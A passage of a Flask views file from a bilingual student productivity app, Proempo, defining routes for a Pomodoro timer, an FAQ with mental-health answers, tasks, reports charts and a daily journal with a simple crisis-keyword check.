title=title,\n description=description\n )\n\n db.session.add(new_feynman_entry)\n db.session.commit()\n\n return jsonify({'message': 'Data saved successfully'})\n\n@views.route('/pomodoro')\n@login_required\ndef pomodoro():\n task_id = request.args.get('taskId')\n task_data = request.args.get('taskData')\n uncompleted_tasks = Task.query.filter_by(user_id=current_user.id).all()\n\n if current_user.language == \"ro\":\n title=\"Ceas Pomodoro\"\n start=\"Începe\"\n pause=\"Pauză\"\n reset=\"Resetă\"\n workTime=\"Timp de muncit (min)\"\n shortBreak=\"Pauză mică (min)\"\n longBreak=\"Pauză lungă (min)\"\n task = \"În această sesiune voi lucra la:\"\n question=\"Ce este Pomodoro?\"\n explanation1=\"Tehnica Pomodoro este o metodă de gestionare a timpului care folosește un cronometru pentru a descompune munca în intervale.\"\n explanation2=\"5 pași simpli:\"\n explanation3=\"1. Decideți asupra sarcinii pe care trebuie să o faceți\"\n explanation4=\"2. Setați timpul de lucru la 25 de minute (reglabil)\"\n explanation5=\"3. Lucrați la sarcina stabilită până când sună cronometrul\"\n explanation6=\"4. Luați o scurtă pauză de 5 minute (reglabilă)\"\n explanation7=\"5. 
După 4 sesiuni, luați o pauză mai lungă.\"\n else: \n title=\"Pomodoro Timer\"\n start=\"Start\"\n pause=\"Pause\"\n reset=\"Reset\"\n workTime=\"Work Time (min)\"\n shortBreak=\"Short Break (min)\"\n longBreak=\"Long Break (min)\"\n question=\"What is Pomodoro?\"\n explanation1=\"The Pomodoro Technique is a time management method that uses a timer to break down work in intervals.\"\n explanation2=\"5 easy steps:\"\n explanation3=\"1. Decide on the task that you need to do\"\n explanation4=\"2. Set the work time to 25 minutes (adjustable)\"\n explanation5=\"3. Work on the set task until the timer rings\"\n explanation6=\"4. Take a short 5 minute break (adjustable)\"\n explanation7=\"5. After 4 cycles, take a longer break.\"\n\n return render_template('pomodoro.html', task_id=task_id, task_data=task_data, user=current_user, uncompleted_tasks=uncompleted_tasks, \n title=title, start=start, pause=pause, reset=reset, workTime=workTime, shortBreak=shortBreak, longBreak=longBreak, \n question=question, explanation1=explanation1, explanation2=explanation2, explanation3=explanation3, explanation4=explanation4, \n explanation5=explanation5, explanation6=explanation6, explanation7=explanation7)\n\n\n@views.route('/FAQ')\n@login_required\ndef faq():\n if current_user.language == \"ro\":\n accordion_items = [\n {\n \"id\": \"section1\",\n \"title\": \"Începerea\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested1\", \"title\": \"Există un tutorial sau un proces de inițiere care să mă ajute să navighez în aplicație pentru prima dată?\", \"content\": \"Ne pare rău, site-ul web nu oferă niciun tutorial sau nu oferă niciun proces.\"},\n {\"id\": \"nested2\", \"title\": \"Care este modelul de preț pentru site-ul dvs.? Există versiuni gratuite sau de încercare disponibile?\", \"content\": \"Acest site este gratuit, nu există un model de preț sau versiuni de încercare.\"},\n {\"id\": \"nested3\", \"title\": \"Ce este tehnica pomodoro? Cum o pot utiliza pe site?\", \"content\": \"Tehnica pomodoro este o metodă de gestionare a timpului bazată pe sesiuni de lucru concentrate de 25 de minute întrerupte de pauze de cinci minute. Puteți utiliza această tehnică în pagina de Ajutor personal.\"},\n {\"id\": \"nested4\", \"title\": \"Ce este tehnica Feynman? Cum o pot utiliza pe site?\", \"content\": \"Tehnica Feynman este un proces în patru pași pentru înțelegerea oricărui subiect. Ea respinge reținerea automată în favoarea înțelegerii autentice obținute prin selecție, cercetare, scriere, expunere și rafinare. Puteți găsi această tehnică în pagina de Ajutor personal.\"},\n {\"id\": \"nested5\", \"title\": \"Ce este zgomotul alb? Cum mă poate ajuta zgomotul alb în timp ce utilizez acest site?\", \"content\": \"Zgomotul alb este un sunet constant și uniform care conține putere egală la toate frecvențele auzibile. 
Vă poate ajuta prin mascarea zgomotului de fundal, îmbunătățirea concentrării și a atenției și crearea unui mediu sonor constant.\"},\n {\"id\": \"nested6\", \"title\": \"Unde pot să merg pentru a lua legătura cu suportul dacă nu sunt disponibile problemele listate pe pagină?\", \"content\": \"Puteți vizita pagina de Suport din bara de navigație și să vă listați problemele acolo.\"}\n ],\n },\n {\n \"id\": \"section2\",\n \"title\": \"Sănătatea Mintală\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested8\", \"title\": \"Care este relația dintre sănătatea mintală și productivitate?\", \"content\": \"Starea sănătății mintale și nivelul de productivitate au o relație foarte strânsă, însă mulți oameni aleg să ignore această relație. Sănătatea mintală constă în multe aspecte, cum ar fi stresul, anxietatea și depresia. De obicei, o persoană care se confruntă cu aceste provocări va avea niveluri mai scăzute de implicare, creativitate și rezolvare a problemelor. Proempo încearcă să mențină o relație pozitivă între aceste două aspecte ale vieții.\"},\n {\"id\": \"nested9\", \"title\": \"Cum mă va ajuta Proempo să gestionez stresul și anxietatea?\", \"content\": \"Ca studenți, noi, la Proempo, avem multă empatie față de oamenii care luptă să-și controleze gândurile și sunt foarte stresați din cauza termenelor limită. Organizarea vieții tale este un mod excelent de a începe să faci față stresului și/sau anxietății. Păstrând toate activitățile, temele școlare sau pur și simplu notele și amintirile generale într-un loc central ușor accesibil. Acest lucru va arăta cât timp ai pentru a face aceste sarcini. Te vei simți în siguranță văzând că ai completat sarcinile. Proempo oferă și o secțiune de jurnalizare pentru a ajuta cu anxietatea trăită în viața ta de zi cu zi.\"},\n {\"id\": \"nested10\", \"title\": \"Care este scopul jurnalizării?\", \"content\": \"Jurnalizarea este o activitate excelentă pentru a te ajuta pe tine însuți. În timpul jurnalizării, nu există factori externi de care să-ți faci griji, în afara lui „Eu, eu și eu”. Acesta este un spațiu sigur în care poți elibera toate gândurile și sentimentele acumulate pe o pagină. Pe măsură ce trece timpul, vei avea multe jurnale care îți vor arăta cum te-ai simțit într-o zi anume și motivul pentru care acea zi a avut acel rezultat. Privind înapoi la aceste jurnale, vei vedea cât de mult te-ai dezvoltat ca persoană și vei învăța din trecutul tău.\"},\n {\"id\": \"nested11\", \"title\": \"Ce este epuizarea și ce trebuie să fac dacă o experimentez?\", \"content\": \"Epuizarea este o stare de oboseală fizică și/sau emoțională care poate afecta identitatea cuiva și sentimentul de a fi realizat. Pașii pentru a reduce epuizarea încep cu căutarea de sprijin din partea membrilor familiei sau colegilor pentru a vă ajuta să colaborați și să faceți față a ceea ce simțiți. Puteți să încercați să vă dedicați timp unei activități sau hobby pe care îl apreciați și care vă relaxează sau chiar să faceți exerciții. 
„Leacul” pentru epuizare constă în a lua o pauză de la muncă sau școală sau de la alte factori care ar putea cauza această stare.\"},\n {\"id\": \"nested12\", \"title\": \"Unde pot să merg pentru a cere ajutor?\", \"content\": \"Dacă aveți nevoie de ajutor serios sau de suport dincolo de serviciile noastre, iată câteva resurse pe care le puteți verifica: Linia de viață pentru suicid și criză: 988, Terapie.\"}\n ],\n },\n {\n \"id\": \"section3\",\n \"title\": \"Productivitate\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested13\", \"title\": \"Ce funcționalități oferă site-ul pentru a îmbunătăți productivitatea?\", \"content\": \"Funcționalitățile oferite pe site sunt metoda pomodoro și tehnica Feynman, ambele fiind disponibile în pagina de Ajutor personal.\"},\n {\"id\": \"nested14\", \"title\": \"Puteți oferi sfaturi pentru stabilirea și atingerea obiectivelor de productivitate?\", \"content\": \"Sfaturile noastre pentru utilizarea acestui site în stabilirea și atingerea obiectivelor includ crearea de sarcini, utilizarea metodei pomodoro, crearea de carduri cu întrebări și realizarea de pauze pentru a preveni epuizarea.\"},\n {\"id\": \"nested15\", \"title\": \"Cum joacă gestionarea timpului un rol în productivitate? Poate site-ul dvs. să ajute în acest sens?\", \"content\": \"Gestionarea timpului joacă un rol crucial în productivitate, ajutând persoanele să-și prioritizeze sarcinile, să aloce timp eficient și să minimizeze distragerile. O gestionare eficientă a timpului permite o mai bună organizare și le permite persoanelor să realizeze mai mult în mai puțin timp, ceea ce duce la o productivitate mai mare. Site-ul nostru poate oferi utilizatorilor crearea unei sarcini în pagina de sarcini, utilizarea metodei pomodoro pentru a seta un cronometru, împreună cu finalizarea sarcinilor create din pagina de sarcini, crearea de carduri cu întrebări în pagina de Ajutor personal, etc. Vă rugăm să verificați pagina de Ajutor personal dacă doriți să vă îmbunătățiți productivitatea.\"},\n {\"id\": \"nested16\", \"title\": \"Care sunt câteva strategii pentru a învinge procrastinarea și a menține concentrarea?\", \"content\": \"Site-ul nostru poate lista câteva strategii. Descompuneți sarcinile în pași mai mici. Stabiliți obiective specifice și realizabile. Utilizați un cronometru pentru muncă concentrată, precum metoda pomodoro. Minimizați distragerile cu ajutorul player-ului nostru de zgomot alb încorporat. Răsfățați-vă pentru finalizarea sarcinilor. Creați un spațiu de lucru dedicat. Prioritizați sarcinile în funcție de importanță și urgență.\"},\n {\"id\": \"nested17\", \"title\": \"Cum pot să prioritizez eficient sarcinile și proiectele pentru a-ți optimiza productivitatea?\", \"content\": \"Puteți prioritiza sarcinile utilizând steaua ca o modalitate de a vă favoriza sarcinile, personalizarea suplimentară este disponibilă în setări. În ceea ce privește proiectele, deocamdată nu oferim nimic pentru prioritizarea proiectelor pe site.\"},\n {\"id\": \"nested18\", \"title\": \"Cum pot să urmăresc progresul și să măsurăm câștigurile de productivitate folosind site-ul?\", \"content\": \"Puteți urmări progresul pe site cu ajutorul graficelor și diagramele furnizate pentru a măsura progresul dvs. 
actual de productivitate.\"}\n ],\n },\n]\n FAQtitle = \"Întrebări frecvente\"\n subtitle = \"Dacă aveți alte întrebări, vă rugăm să consultați celelalte secțiuni de mai jos.\"\n else:\n accordion_items = [\n {\n \"id\": \"section1\",\n \"title\": \"Getting Started\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested1\", \"title\": \"Is there a tutorial or onboarding process to help me navigate the application for the first time?\", \"content\": \"Sorry, the website doesn't provide any tutorial or offer any onboarding process.\"},\n {\"id\": \"nested2\", \"title\": \"What is the pricing model for your website? Are there any free or trial versions available?\", \"content\": \"This website is free; there is no pricing model nor any trial versions.\"},\n {\"id\": \"nested3\", \"title\": \"What is the pomodoro technique? How can I use it on the website?\", \"content\": \"The pomodoro technique is a time management method based on 25-minute stretches of focused work broken by five-minute breaks. You can use the technique located in the Self-Help page.\"},\n {\"id\": \"nested4\", \"title\": \"What is the feynman technique? How can I use it on the website?\", \"content\": \"The feynman technique is a four-step process for understanding any topic. It rejects automated recall in favor of true comprehension gained through selection, research, writing, explaining, and refining. You can find it located in the self-help page.\"},\n {\"id\": \"nested5\", \"title\": \"What is white noise? How can white noise help me while using this website?\", \"content\": \"White noise is a consistent and uniform sound that contains equal power across all audible frequencies. It can help you by masking background noise, improving focus and concentration, and having a consistent sound environment.\"},\n {\"id\": \"nested6\", \"title\": \"Where can I go to contact support if any of the issues listed on the page aren't available?\", \"content\": \"You can visit the Support page in the navigation bar and list your issues there.\"}\n ],\n },\n {\n \"id\": \"section2\",\n \"title\": \"Mental Health\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested8\", \"title\": \"What is the relationship between mental health and productivity?\", \"content\": \"The state of your mental health and how productive you are have a very interconnected relationship, but many people choose to ignore this relationship. Mental health consists of many things such as stress, anxiety, and depression. Typically, someone who has any of these challenges will experience lower levels of engagement, creativity and problem solving. Proempo looks to keep a positive relationship between these two factors of life.\"},\n {\"id\": \"nested9\", \"title\": \"How will Proempo help me manage my stress and anxiety?\", \"content\": \"As students, here at Proempo, we have a lot of empathy towards people struggling to control their thoughts and are very stressed about deadlines. Organizing your life is a great way to get started with handling your stress and/or anxiety, by keeping all your activities, schoolwork, or just general notes and reminders in one centrally located place that is easily accessible. Having this will lay out how much time you have to do these tasks. You will be at ease seeing that your tasks are completed. Proempo also offers a journaling section to help with anxiety experienced in your everyday life.\"},\n {\"id\": \"nested10\", \"title\": \"What is the point of journaling?\", \"content\": \"Journalling is a great activity to help yourself. While journaling there are no outside factors to worry about except “Me, myself and I”. This is a safe space where you can heave all your pent-up thoughts and feelings onto a page. As time goes on you will have many journals telling you how you felt during a particular day and the reason that day followed that outcome. Looking back at these journals will show you how much you have developed as a person and learn from your past self.\"},\n {\"id\": \"nested11\", \"title\": \"What is burnout and what to do if I experience it?\", \"content\": \"Burnout is a state of physical and/or emotional exhaustion that can come to affect someone’s identity and sense of feeling accomplished. Steps to help reduce burnout start with seeking support from family members or colleagues to help you collaborate and cope with what you are feeling. You could go ahead and try an activity or hobby you really enjoy that gets you relaxed or even exercise. The “cure” to burnout is taking a break from either work or school or other factors that might be causing this.\"},\n {\"id\": \"nested12\", \"title\": \"Where can I go to seek support?\", \"content\": \"If in need of serious help or support beyond our services, here are some resources to look into: Suicide and Crisis lifeline: 988, Therapy.\"}\n \n ],\n },\n {\n \"id\": \"section3\",\n \"title\": \"Productivity\",\n \"content\": \"\",\n \"nested_items\": [\n {\"id\": \"nested13\", \"title\": \"What features does the website offer to enhance productivity?\", \"content\": \"The features offered in the website are the pomodoro method and the feynman technique, which are both located in the self-help page.\"},\n {\"id\": \"nested14\", \"title\": \"Can you provide tips for setting and achieving productivity goals?\", \"content\": \"Our tips to utilizing this website for setting and achieving goals are creating tasks, using the pomodoro method, creating flashcards, and taking a break to prevent burnout.\"},\n {\"id\": \"nested15\", \"title\": \"How does time management play a role in productivity? Can your website assist with this?\", \"content\": \"Time management plays a crucial role in productivity by helping individuals prioritize tasks, allocate time efficiently, and minimize distractions. Effective time management enables better organization and allows individuals to accomplish more in less time, leading to increased productivity. Our website offers users the ability to create a task within the tasks page, use the pomodoro method to set a timer along with completing the tasks created from the task page, create flashcards in the self-help page, etc. Please check the self-help page if you want to enhance your productivity.\"},\n {\"id\": \"nested16\", \"title\": \"What are some strategies for overcoming procrastination and maintaining focus?\", \"content\": \"Our website can list some strategies. Break tasks into smaller steps. Set specific, achievable goals. Use a timer for focused work like the pomodoro method. Minimize distractions with our built-in white noise player. Reward yourself for completing tasks. Create a dedicated workspace. Prioritize tasks based on importance and urgency.\"},\n {\"id\": \"nested17\", \"title\": \"How can I effectively prioritize tasks and projects to optimize my productivity?\", \"content\": \"You can prioritize tasks by using the star as a way to favorite tasks; further customization is available in the settings. As for projects, we don't offer anything to prioritize projects on the website for now.\"},\n {\"id\": \"nested18\", \"title\": \"How can I track my progress and measure my productivity gains using the website?\", \"content\": \"You can track progress in the website with the provided graphs and charts to measure your current productivity progress.\"},\n ],\n },\n \n ]\n FAQtitle = \"Frequently Asked Questions\"\n subtitle = \"If you have other questions, please check out the other sections below.\"\n return render_template(\"FAQ.html\", user=current_user, accordion_items=accordion_items, FAQtitle=FAQtitle, subtitle=subtitle)\n\n\n\n@views.route('/bearMeditation')\n@login_required\ndef bearMeditation():\n return render_template(\"bearMeditation.html\", user=current_user)\n\n@views.route('/regularMeditation')\n@login_required\ndef regularMeditation():\n return render_template(\"regularMeditation.html\", user=current_user)\n\n@views.route('/tasks', methods=['GET', 'POST'])\n@login_required\ndef tasks():\n if current_user.language == \"ro\":\n taskTitle = \"Sarcini\"\n dueDate = \"Data Scadenței: (Opțional)\"\n dueTime = \"Timp Cuvenit: (Opțional)\"\n taskEnter = \"Sarcină:\"\n taskButton = \"Adăugați o Sarcină\"\n congrats1 = \"Felicitări! Nu ai sarcini!\"\n congrats2 = \"Faceți o nouă sarcină mai sus.\"\n taskDueDate = \"Data Scadenței:\"\n at = \"la\"\n archiveTaskButton = \"Sarcini Arhivate\"\n sortBy = \"Filtrează după\"\n oldToNew = \"De la cel mai vechi la cel mai nou\"\n newToOld = \"De la cel mai nou la cel mai vechi\"\n sortDueDate = \"Data Scadenței\"\n alphabetically = \"Alfabetic\"\n sortDefault = \"(Mod Implicit)\"\n else:\n taskTitle = \"Tasks\"\n dueDate = \"Due Date: (Optional)\"\n dueTime = \"Due Time: (Optional)\"\n taskEnter = \"Task:\"\n taskButton = \"Add Task\"\n congrats1 = \"Congratulations! 
You have no tasks!\"\n congrats2 = \"Make a new task above.\"\n taskDueDate = \"Due Date:\"\n at = \"at\"\n archiveTaskButton = \"Archived Tasks\"\n sortBy = \"Sort by\"\n oldToNew = \"Oldest to Newest\"\n newToOld = \"Newest to Oldest\"\n sortDueDate = \"Due Date\"\n alphabetically = \"Alphabetically\"\n sortDefault = \"(Default)\"\n\n if request.method == 'POST':\n task_data = request.form.get('task') # Gets the task from the HTML\n due_date_str = request.form.get('dueDate') # Gets the due date string\n due_time_str = request.form.get('dueTime') # Gets due time\n\n if len(task_data) < 1:\n flash('You must enter a task!', category='error')\n elif due_time_str and not due_date_str:\n flash('You cannot have a due time without choosing a due date!', category='error')\n else:\n due_date = None # Default to None if no due date is provided\n due_time = None\n if due_date_str:\n due_date = datetime.strptime(due_date_str, '%Y-%m-%d').date()\n\n if due_time_str:\n due_time = datetime.strptime(due_time_str, '%H:%M').time()\n\n new_task = Task(\n data=task_data,\n due_date=due_date,\n due_time=due_time,\n user_id=current_user.id\n )\n\n db.session.add(new_task) # Add the task to the database\n db.session.commit()\n flash('Task added!', category='success')\n\n selected_sort = request.args.get('sort_method', 'default')\n\n user_id = current_user.id\n\n if selected_sort == 'due_date':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(Task.due_date, Task.due_time)\n elif selected_sort == 'data':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(func.lower(Task.data))\n elif selected_sort == 'newest':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(Task.date.desc())\n elif selected_sort == 'oldest':\n tasks = Task.query.filter(Task.user_id == user_id).order_by(Task.date)\n else:\n tasks = Task.query.filter(Task.user_id == user_id).order_by(text(current_user.defaultsort))\n\n\n return render_template('tasks.html', user=current_user, dueDate=dueDate, dueTime=dueTime, taskTitle=taskTitle, \n tasks=tasks, taskEnter=taskEnter, taskButton=taskButton, congrats1=congrats1, congrats2=congrats2, \n taskDueDate=taskDueDate, at=at, archiveTaskButton=archiveTaskButton, sortBy=sortBy, selected_sort=selected_sort,\n oldToNew=oldToNew, newToOld=newToOld, sortDueDate=sortDueDate, alphabetically=alphabetically, sortDefault=sortDefault)\n\n\n@views.route('/archivedtasks')\n@login_required\ndef archivedtasks():\n if current_user.language == \"ro\":\n noArchivedTasks = \"Nimic aici...\"\n archiveWarning = \"Sigur doriți să ștergeți definitiv această sarcină? Odată ce o sarcină este ștearsă, aceasta nu va mai fi luată în considerare în statisticile și graficele dvs. Vă recomandăm să nu ștergeți sarcini decât dacă doriți cu adevărat.\"\n else:\n noArchivedTasks = \"Nothing Here...\"\n archiveWarning = \"Are you sure you want to permanently delete this task? Once a task is deleted it will no longer be factored into your statistics and charts. 
We recommend not deleting tasks unless you really want to.\"\n archivedtasks = ArchivedTask.query.filter_by(user_id=current_user.id).order_by(ArchivedTask.date).all()\n return render_template('archivedtasks.html', archivedtasks=archivedtasks, noArchivedTasks=noArchivedTasks, archiveWarning=archiveWarning, user=current_user)\n \n\n\n@views.route('/reports')\n@login_required\ndef reports():\n if current_user.language == \"ro\":\n reportsTitle = \"Rapoarte\"\n\n else:\n reportsTitle = \"Reports\"\n #code for the first graph on page\n end_date = datetime.now()\n start_date = end_date - timedelta(days=6) \n finished_tasks_data = (\n db.session.query(\n func.strftime('%Y-%m-%d', FinishedTask.date).label('date'),\n func.count(FinishedTask.id).label('finished_count')\n )\n .filter(FinishedTask.user_id == current_user.id)\n .filter(FinishedTask.date >= start_date)\n .filter(FinishedTask.date <= end_date)\n .group_by(func.strftime('%Y-%m-%d', FinishedTask.date))\n .all()\n )\n archived_tasks_data = (\n db.session.query(\n func.strftime('%Y-%m-%d', ArchivedTask.date).label('date'),\n func.count(ArchivedTask.id).label('finished_count')\n )\n .filter(ArchivedTask.user_id == current_user.id)\n .filter(ArchivedTask.date >= start_date)\n .filter(ArchivedTask.date <= end_date)\n .group_by(func.strftime('%Y-%m-%d', ArchivedTask.date))\n .all()\n )\n data_dict = {}\n current_day = start_date\n while current_day <= end_date:\n formatted_date = current_day.strftime('%Y-%m-%d')\n data_dict[formatted_date] = 0 # Initialize all days with zero completed tasks\n current_day += timedelta(days=1)\n\n for row in finished_tasks_data:\n date_str = row.date\n data_dict[date_str] = row.finished_count\n\n for row in archived_tasks_data:\n date_str = row.date\n data_dict[date_str] += row.finished_count\n\n\n finished_tasks_list = [{'date': date, 'finished_count': count} for date, count in data_dict.items()]\n finished_tasks_json = json.dumps(finished_tasks_list)\n\n # Query to find the most popular day-rating\n most_popular_day_rating = (\n db.session.query(Journal.day_rating, func.count().label('count'))\n .filter(Journal.user_id == current_user.id)\n .group_by(Journal.day_rating)\n .order_by(func.count().desc())\n .limit(1)\n .first()\n )\n\n most_popular_rating = most_popular_day_rating[0] if most_popular_day_rating else \"No data available\"\n # !!!!! 
need to handle what happens when there is a tie\n\n\n\n\n # Code for the second visualization\n goals_count = Goal.query.filter(\n and_(Goal.user_id == current_user.id, Goal.status == \"C\")\n ).count()\n\n latest_completed_goals = Goal.query.filter(\n and_(Goal.user_id == current_user.id, Goal.status == \"C\")\n ).order_by(Goal.date.desc()).limit(3).all()\n\n day_ratings = Journal.query.filter_by(user_id=current_user.id).with_entities(Journal.date, Journal.day_rating).all()\n\n # Map day ratings to numerical values\n converted_ratings = {'horrible': 1, 'bad': 2, 'good': 3, 'excellent': 4}\n day_rating_data = [{'date': str(date), 'rating': converted_ratings.get(rating.lower(), 0)} for date, rating in day_ratings]\n\n day_rating_json = json.dumps(day_rating_data)\n print(day_rating_json)\n\n\n\n if current_user.language == \"ro\":\n chart1Title=\"Sarcinile pe care le-am finalizat în această săptămână\"\n goalsAchieved=\"Obiective Realizate\"\n latestCompletedGoals=\"Ultimele obiective îndeplinite\"\n mostFrequentDayRating=\"Evaluarea mea cea mai frecventă de zi\"\n myHistory=\"Istoricul evaluării zilei mele\"\n noDayRatings=\"Se pare că nu ați înregistrat nicio evaluare zilnică. Vă rugăm să adăugați aceste date pentru a vă putea genera raportul.\"\n no_goals_message=\"Se pare că nu ți-ai stabilit niciun obiectiv.\"\n dayHistory = \"Istoricul evaluării zilei mele\"\n else:\n chart1Title=\"Amount of tasks I completed this week\"\n goalsAchieved=\"Goals Achieved\"\n latestCompletedGoals = \"Latest Completed Goals\"\n mostFrequentDayRating=\"My most frequent day rating\"\n myHistory=\"My Day Rating History\"\n noDayRatings=\"It appears that you have not logged any day ratings. Please add this data so that we can generate your report.\"\n no_goals_message=\"It appears as if you have not set any goals.\"\n dayHistory = \"My Day Rating History\"\n if goals_count > 0:\n return render_template(\"reports.html\", user=current_user, reportsTitle=reportsTitle, finished_tasks=finished_tasks_json, goals_count=goals_count, latest_completed_goals=latest_completed_goals, most_popular_rating=most_popular_rating, day_rating_json=day_rating_json, \n chart1Title=chart1Title, goalsAchieved=goalsAchieved, latestCompletedGoals=latestCompletedGoals,\n mostFrequentDayRating=mostFrequentDayRating, myHistory=myHistory, noDayRatings=noDayRatings, dayHistory=dayHistory)\n else:\n return render_template(\"reports.html\", user=current_user, reportsTitle=reportsTitle, finished_tasks=finished_tasks_json, goals_count=goals_count, no_goals_message=no_goals_message, most_popular_rating=most_popular_rating, day_rating_json=day_rating_json, \n chart1Title=chart1Title, goalsAchieved=goalsAchieved, latestCompletedGoals=latestCompletedGoals,\n mostFrequentDayRating=mostFrequentDayRating, myHistory=myHistory, noDayRatings=noDayRatings, dayHistory=dayHistory)\n\n\n@views.route('/journal', methods=['GET', 'POST'])\n@login_required\ndef journal():\n selected_entry = None #Initialize selected_entry to None\n if current_user.language == \"ro\":\n journalTitle = \"Verificare Zilnică\"\n journalSelect = \"Selectați o intrare anterioară:\"\n journalChoose = \"Selectați o intrare\"\n journalButton = \"Aplică\"\n journalDate = \"Data:\"\n dearJournal = \"Draga Jurnalule,\"\n journalContent = \"Astăzi, mi-am petrecut ziua gândindu-mă la...\"\n gratefulContent = \"3 lucruri pentru care sunt recunoscător astăzi sunt:\"\n dayTitle = \"Ziua mea a fost...\"\n rating_excellent = \"Excelent\"\n rating_good = \"Bun\"\n rating_bad = \"Rău\"\n 
rating_horrible = \"Oribil\"\n saveJournal = \"Salvați\"\n journalFooter = \"Ceea ce este în mintea ta?\"\n else:\n journalTitle = \"Daily Check-In\"\n journalSelect = \"Select a previous entry:\"\n journalChoose = \"Select an entry\"\n journalButton = \"Go\"\n journalDate = \"Date:\"\n dearJournal = \"Dear Journal,\"\n journalContent = \"Today, I spent my day thinking about...\"\n gratefulContent = \"3 things I am grateful for today are:\"\n dayTitle = \"My day was...\"\n rating_excellent = \"Excellent\"\n rating_good = \"Good\"\n rating_bad = \"Bad\"\n rating_horrible = \"Horrible\"\n saveJournal = \"Save Entry\"\n journalFooter = \"What is on your mind?\"\n today = datetime.now().date()\n entry_for_today = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n if entry_for_today:\n selected_entry = entry_for_today\n\n\n if request.method == 'POST':\n if is_entry_exists_for_today():\n flash('Entry already exists for today. Cannot check-in again today.', category='error')\n else:\n\n #Handle form submission\n date = datetime.now().date()\n dear_journal_content = request.form.get('dear_journal_content')\n grateful_contents = [request.form.get('grateful1'), request.form.get('grateful2'), request.form.get('grateful3')]\n day_rating = request.form.get('day_rating')\n\n \n\n #Create a new journal entry\n journal_entry = Journal(\n date=date,\n user_id=current_user.id,\n dear_journal_content=dear_journal_content,\n grateful_content=','.join(grateful_contents),\n day_rating=day_rating\n )\n \n db.session.add(journal_entry)\n db.session.commit()\n \n list = [\"suicide\", \"murder\", \"kill\", \"hurt\", \"die\", \"Suicide\", \"Murder\", \"Kill\", \"Hurt\", \"Die\"]\n if any(word in dear_journal_content for word in list):\n db.session.commit()\n flash('Your journal may contain thoughts that may harm yourself or others.', category='error')\n flash('Help is out there. Call 988 or chat online. https://988lifeline.org/chat/', category='error')\n elif any(word in grateful_contents for word in list):\n db.session.commit()\n flash('Your journal may contain thoughts that may harm yourself or others.', category='error')\n flash('Help is out there. Call 988 or chat online. 
https://988lifeline.org/chat/', category='error')\n return redirect(url_for('views.journal'))\n elif request.method == 'GET':\n previous_entries = Journal.query.filter(Journal.user_id == current_user.id).all()\n\n previous_entry_id = request.args.get('previous_entry')\n\n if previous_entry_id:\n selected_entry = Journal.query.get(previous_entry_id)\n date = (datetime.now().date())\n \n return render_template('journal.html', user=current_user, journalTitle=journalTitle, journalSelect=journalSelect, \n journalChoose=journalChoose, journalButton=journalButton, journalDate=journalDate, dearJournal=dearJournal, \n journalContent=journalContent, gratefulContent=gratefulContent, dayTitle=dayTitle, rating_excellent=rating_excellent, \n rating_good=rating_good, rating_bad=rating_bad, rating_horrible=rating_horrible, saveJournal=saveJournal, \n journalFooter=journalFooter, previous_entries=previous_entries, selected_entry=selected_entry, date=date)\n'''\n@views.route('/scanJournal', methods=['POST'])\n@login_required\ndef scan_Journal():\n journal_entry = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n list = [\"suicide\", \"murder\", \"kill\", \"hurt\"]\n if is_entry_exists_for_today():\n if any(word in journal_entry for word in list):\n db.session.commit()\n return flash('Your journal contained concerning words. What is hurting you?', category='error')\n return jsonify({})\n'''\ndef is_entry_exists_for_today():\n today = date.today()\n\n entry_for_today = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n\n return entry_for_today is not None\n\n\n@views.route('/delete-task', methods=['POST'])\ndef delete_task(): \n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task and task.user_id == current_user.id:\n # Create a archived with the same data and due date as the original task\n archivedtask = ArchivedTask(data=task.data, user_id=current_user.id, due_date=task.due_date, due_time=task.due_time, date=task.date, was_completed=0)\n\n # Add and commit changes to the database\n db.session.add(archivedtask)\n db.session.delete(task)\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/delete-finished-task', methods=['POST'])\ndef delete_finished_task(): \n task_data = json.loads(request.data)\n finished_task_id = task_data['finishedTaskId']\n\n finished_task = FinishedTask.query.get(finished_task_id)\n\n if finished_task and finished_task.user_id == current_user.id:\n # Create a Task with the same data and due date as the FinishedTask\n archivedtask = ArchivedTask(data=finished_task.data, user_id=current_user.id, due_date=finished_task.due_date, due_time=finished_task.due_time, date=finished_task.date, was_completed=1)\n\n # Add and commit changes to the database\n db.session.add(archivedtask)\n db.session.delete(finished_task)\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/delete-archived-task', methods=['POST'])\ndef delete_archivedtask(): \n archivedtask_data = json.loads(request.data)\n archivedTaskId = archivedtask_data['archivedTaskId']\n archivedtask = ArchivedTask.query.get(archivedTaskId)\n\n if archivedtask and archivedtask.user_id == current_user.id:\n db.session.delete(archivedtask)\n db.session.commit()\n\n return jsonify({})\n\n\n@views.route('/mark-task', methods=['POST'])\n@login_required\ndef mark_task():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task 
and task.user_id == current_user.id:\n # Create a FinishedTask with the same data and due date as the original task\n finished_task = FinishedTask(data=task.data, user_id=current_user.id, due_date=task.due_date, due_time=task.due_time, date=task.date)\n\n # Add and commit changes to the database\n db.session.add(finished_task)\n db.session.delete(task)\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/star-task', methods=['POST'])\n@login_required\ndef star_task():\n task_data = json.loads(request.data)\n task_id = task_data['taskId']\n\n task = Task.query.get(task_id)\n\n if task and task.user_id == current_user.id:\n # Toggle the starred status\n task.starred = 1 if task.starred != 1 else 0\n db.session.commit()\n\n return jsonify({})\n\n@views.route('/unmark-task', methods=['POST'])\n@login_required\ndef unmark_task():\n task_data = json.loads(request.data)\n finished_task_id = task_data['finishedTaskId']\n\n finished_task = FinishedTask.query.get(finished_task_id)\n\n if finished_task and finished_task.user_id == current_user.id:\n # Create a Task with the same data and due date as the FinishedTask\n task = Task(data=finished_task.data, user_id=current_user.id, due_date=finished_task.due_date, due_time=finished_task.due_time, date=finished_task.date)\n\n # Add and 